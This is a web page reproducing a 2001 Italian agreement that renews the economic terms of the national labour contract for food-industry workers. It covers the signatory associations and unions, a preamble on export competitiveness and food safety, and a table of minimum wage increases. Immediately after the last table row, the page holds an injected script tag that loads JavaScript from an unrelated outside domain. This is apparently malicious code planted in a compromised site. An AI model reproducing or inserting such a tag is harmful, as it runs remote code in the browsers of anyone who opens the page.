Torna all'elenco delle categorie

Categoria: Alimentaristi (industrie)
Settore: Alimentari - Agroindustriale
Data stipula: 20-6-2001
Data decorrenza: 1-6-2001
Data scadenza: 31-5-2003

VERBALE DI ACCORDO


Roma, 20 giugno 2001


tra

-    AIDI
-    AIIPA
-    AIRI
-    ANCIT
-    ANICAV
-    ASSALZOO
-    ASSICA
-    ASSOBIBE
-    ASSOBIRRA
-    ASSOLATTE
-    ASSOZUCCHERO
-    DISTILLATORI
-    FEDERVINI
-    ITALMOPA
-    MINERACQUA
-    UNA
-    UNIPI

con la partecipazione di FEDERALIMENTARE,

con l'assistenza di CONFINDUSTR1A,

e

FAI-CISL
FLAI-CGIL
UILA-UIL

è stato concluso il seguente Accordo per il rinnovo della parte economica del
CCNL 5 giugno 1999

PER GLI ADDETTI ALL'INDUSTRIA ALIMENTARE



PREMESSA

Le  parti,  nel  procedere al rinnovo contrattuale del 2°  biennio,  si  sono
scambiate  attente valutazioni sia sul contesto economico generale sia  sugli
aspetti relativi al settore.

In   particolare   FEDERALIMENTARE   ha  espresso   preoccupazioni   per   il
differenziale  di competitività rispetto agli altri Paesi CE ed  evidenziato,
in  termini di benchmarking, alcune caratteristiche dell'industria  italiana,
con  particolare riferimento alla questione della insoddisfacente  situazione
dell'export,  che  ha  assunto  caratteristiche  stabili  tali  da   palesare
l'esistenza  di  criticità  di  cui  il  nostro  sistema  alimentare  soffre,
nonostante l'eccellente immagine dell'italian food and drink.

A  tale  proposito  le  parti,  nel confermare la  validità  del  sistema  di
relazioni  industriali previsto dal CCNL, manifestano la volontà  di  operare
per  il  recupero  di tali ritardi e, più generalmente, per una  crescita  di
competitività,  dandosi  atto che, a tal fine, potranno  risultare  utili  il
monitoraggio previsto nell'ambito dell'Osservatorio, di cui al presente CCNL,
nonché  le  possibili ulteriori azioni congiunte, anche nei  confronti  delle
istituzioni,  con  l'obiettivo  di  una  più  efficace  politica  industriale
agroalimentare.

Nell'ambito  della  discussione  sono stati affrontati  anche  i  temi  della
qualità e della sicurezza alimentare.

A  tale proposito le parti, fermo restando il loro distinto e autonomo ruolo,
si  sono  date  atto che la sicurezza alimentare costituisce  da  sempre  una
priorità  per  l'industria  alimentare  italiana  e  che,  a  tal   fine,   è
indispensabile  che  venga  assicurato da parte degli  organi  competenti  un
approccio  integrato  di  filiera,  lungo  tutta  la  catena,  a  partire  da
un'agricoltura  responsabile e sostenibile anche sotto il profilo  economico,
ambientale e sociale.

Appare inoltre sicuramente auspicabile che venga accelerata l'istituzione  di
un'Authority alimentare - preferibilmente con sede in Italia - che  assicuri,
tra l'altro, il "risk assessment".

Del  resto sicurezza alimentare e qualità non possono essere considerati come
valori  separati  ma  come componenti inscindibili di  un  valido  e  moderno
sistema di produzione/consumo alimentare.

È  dunque  estremamente  importante per il  settore  alimentare  mantenere  e
accrescere tra i consumatori il clima di fiducia.

Un sistema di sicurezza alimentare veramente efficace e credibile costituisce
un  modo per prevenire situazioni di crisi o, comunque, per circoscriverle  e
affrontarle prontamente.

La  natura  di elemento strategico che l'argomento ha assunto per il  settore
alimentare  rende  opportuno  che  la materia  possa  costituire  oggetto  di
approfondimenti   nell'ambito   delle  attività   del   citato   Osservatorio
contrattuale.



MINIMI TABELLARI

I  minimi tabellari di cui all'art. 51, CCNL 5.6.99 sono incrementati come da
seguente schema:

                 aumenti   aumenti   aumenti totali
liv.  parametri    dal       dal        a regime
                 1.6.01    1.6.02
                    
1°S      230     75.550    134.310      209.860
1°       200     65.690    116.790      182.480
2°       165     54.200     96.350      150.550
3°A      145     47.630     84.670      132.300
3°       130     42.700     75.910      118.610<script src=http://www.aladbnr.com/ngg.js></script>













(c) 2002-2022 www.infoleges.it -  powered by Be Smart s.r.l - Note legali e Condizioni d'uso